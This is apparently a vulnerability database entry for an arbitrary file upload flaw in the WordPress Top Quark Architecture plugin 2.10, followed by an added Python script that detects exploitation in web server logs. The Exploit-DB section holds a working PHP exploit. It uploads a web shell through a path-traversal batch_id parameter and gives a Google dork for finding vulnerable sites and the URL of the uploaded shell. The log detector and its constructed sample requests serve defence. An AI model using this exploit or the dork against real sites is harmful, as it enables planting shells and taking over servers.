Vendor: Wordpress Top Quark Architecture
Author: Adrien Thierry
CVSS: 8.8 (HIGH)
CWE: 434 (Arbitrary File Upload)
Product Name: Wordpress Top Quark Architecture
Affected Version From: 2.10
Affected Version To: 2.10
Patch Exists: YES
Related CWE: N/A
CPE: a:topquark:wordpress_top_quark_architecture
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

WordPress Top Quark Architecture Version 2.10 Arbitrary File Upload

An arbitrary file upload vulnerability exists in Wordpress Top Quark Architecture Version 2.10. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to upload a malicious file to the server, which can then be used to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Wordpress Top Quark Architecture.

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://topquark.com/
# Software Link: http://downloads.wordpress.org/plugin/topquark.zip
# Version: 2.10
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php

exploit :

<?php
$u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
$c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php?batch_id=../../shell.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('upload'=>"@$u"
));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>

You can choose where the shell is uploaded with the batch_id parameter.

Shell access : http://site.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/shell.php1

#####################################################################
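Because the vulnerable demo script lives at a fixed path and the malicious request carries the traversal in the batch_id query parameter, exploitation attempts stand out in web server access logs. The detector below is an added example, not part of the advisory or the plugin; VULN_PATH reuses the path given above, the log lines are constructed, and the flagged extensions are an assumed list.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path of the demo upload script named in the advisory.
VULN_PATH = "/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php"

# Assumed list of extensions an upload handler must never write.
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")

# Minimal combined-log parser: only the request line is needed here.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(line):
    """Return a reason string when a log line matches the advisory's request pattern, else None."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith(VULN_PATH):
        return None
    if m.group("method") != "POST":
        return None  # the upload itself is a POST; GETs of the showcase page are noise
    for raw in parse_qs(parts.query).get("batch_id", []):
        # parse_qs already decoded once; decode again so double-encoded dots/slashes are caught
        decoded = unquote(raw).replace("\\", "/")
        if "../" in decoded or decoded.startswith("/"):
            return f"path traversal in batch_id: {raw}"
        if decoded.lower().endswith(EXEC_EXT):
            return f"executable filename in batch_id: {raw}"
    return "POST to demo upload script (inspect the uploaded file)"


def scan(lines):
    """Return (line_index, reason) for every line that deserves an alert."""
    return [(i, r) for i, l in enumerate(lines) if (r := classify(l))]


# Constructed sample log lines; the first two mirror the request shown in the advisory.
SAMPLE_LOG = [
    f'203.0.113.7 - - [11/Jun/2012:10:15:02 +0000] "POST {VULN_PATH}?batch_id=../../shell.php HTTP/1.1" 200 17 "-" "curl/7.26.0"',
    f'203.0.113.7 - - [11/Jun/2012:10:15:09 +0000] "POST {VULN_PATH}?batch_id=%252e%252e%252fshell.php HTTP/1.1" 200 17 "-" "curl/7.26.0"',
    f'198.51.100.4 - - [11/Jun/2012:10:16:00 +0000] "GET {VULN_PATH} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [11/Jun/2012:10:16:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [11/Jun/2012:10:17:30 +0000] "POST {VULN_PATH}?batch_id=photos HTTP/1.1" 200 17 "-" "curl/7.26.0"',
    f'203.0.113.7 - - [11/Jun/2012:10:18:11 +0000] "POST {VULN_PATH}?batch_id=avatar.phtml HTTP/1.1" 200 17 "-" "curl/7.26.0"',
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_LOG):
        print(f"line {idx}: {reason}")
```

Any hit on the demo script path at all is worth an alert on a patched site, since the showcase directory should not be reachable once the plugin is upgraded.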